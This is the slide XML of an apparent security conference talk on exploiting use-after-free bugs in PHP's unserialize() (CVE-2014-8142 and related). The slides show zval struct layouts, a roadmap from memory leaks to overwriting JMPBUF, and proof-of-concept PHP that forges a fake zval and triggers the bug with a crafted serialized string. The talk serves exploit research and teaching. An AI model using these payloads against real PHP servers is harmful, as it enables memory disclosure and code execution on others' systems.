              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>md</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ryat</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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https://github.com/80vul/phpcodz/blob/master/research/pch-030.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>md</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ryat</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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https://github.com/80vul/phpcodz/blob/master/research/pch-031.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>md</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ryat</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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https://github.com/80vul/phpcodz/blob/master/research/pch-032.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>md</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ryat</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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https://github.com/80vul/phpcodz/blob/master/research/pch-033.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>md</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ryat</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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https://github.com/80vul/phpcodz/blob/master/research/pch-034.md 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Ryat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> | HITCON 2015 500 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/>
              <a:t>blog.knownsec.com/2015/08/php-7-zend_hash_if_full_do_resize-use-after-free-analysis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PHP7  &amp; me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E8A-7F4A-4CDC-903D-4E78DE2FB198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619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 CVE-2014-8142 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>Exp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5.1 Leak memory info</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>5.2 Leak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>std_object_handlers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addrs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>5.3 Leak libphp5.so ELF info</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>5.4 Leak useful PHP kernel functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>5.5 Leak JMPBUF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>5.6 Crack JMPBUF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>5.7 Overwrite JMPBUF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>5.8 Trigger exception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38DE-B770-41FB-A40F-B6665D962D64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64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5.1 Leak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>memory info</a:t>
            </a:r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5.1.1 ZVAL structure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>5.1.2 Fake ZVAL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>5.1.3 Use after free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1D5-0A9E-4511-A651-F9B90A5780F2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864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5.1.1 ZVAL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>structure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2311021" y="2454282"/>
            <a:ext cx="75699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0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>struct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> _zval_struct {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/* Variable information */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>	zvalue_value value;		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/* value */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>	zend_uint refcount__gc;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>	zend_uchar type;	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/* active type */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>	zend_uchar is_ref__gc;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>};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81CA-B6E1-4588-A81B-F4D90AC4761D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42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5.1.1 ZVAL structure</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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28940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538447"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="838200" y="1825625"/>
          <a:ext cx="10515600" cy="1847850"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="3505200"/>
                <a:gridCol w="3505200"/>
                <a:gridCol w="3505200"/>
              </a:tblGrid>
              <a:tr h="315079">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>属性名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dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>含义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>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>默认值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315079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value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dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>存储变量的值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315079">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>refcount</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>__gc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dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>表示引用计数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effectLst/>
                        </a:rPr>
                        <a:t>1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15079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type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>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>变量具体的类型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15079">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>is_ref__gc</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US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dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>表示是否为引用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effectLst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88EF-5E05-4293-8997-AB621FA31484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8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5.1.1 ZVAL structure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48000" y="1582341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0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>typedef</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>union</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> _zvalue_value {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>long</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> lval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>long value */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>double</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> dval;	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>double value */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>struct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>val;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>len;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>	} str;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>	HashTable *ht</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hash table value */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>	zend_object_value obj;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>} zvalue_value;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2972-0C95-41F7-A098-4C8BE883B4D8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71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5.1.1 Fake ZVAL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048000" y="2413338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400" dirty="0" smtClean="0"/>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>php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$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>fakezval </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>    '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IIII</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>',     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//unsigned int</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x08048000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//address to leak</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x0000000a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//length of string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x00000000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//refcount</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x00000006</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//data type</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>);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1E85-18E9-40AB-82DF-96DAEECAA07E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6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5.1.2 Use after free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048000" y="2274838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400" dirty="0"/>
              <a:t>$obj </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>O:8:"stdClass":3:{s:3:"aaa";a:5:{i:0;i:1;i:1;i:2;i:2;s:10:"AAAAAAAAAA";i:3;i:4;i:4;i:5;}s:3:"aaa";i:1;s:3:"ccc";R:6;}'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>$obj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unserialize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>($obj);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>($i </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> 0; $i </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> 5; $i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>++</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>    $v[$i]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>$fakezval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>$i;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>}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4F9E-4379-45B7-849C-1FF7E9574BD4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6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048000" y="474345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&lt;?php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>$fakezval </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=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rgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>    'IIII',     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//unsigned int</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>    0x08048000, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//address to leak</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>    0x0000000a, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//length of string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>    0x00000000, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//refcount</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>    0x00000006  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//data type</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
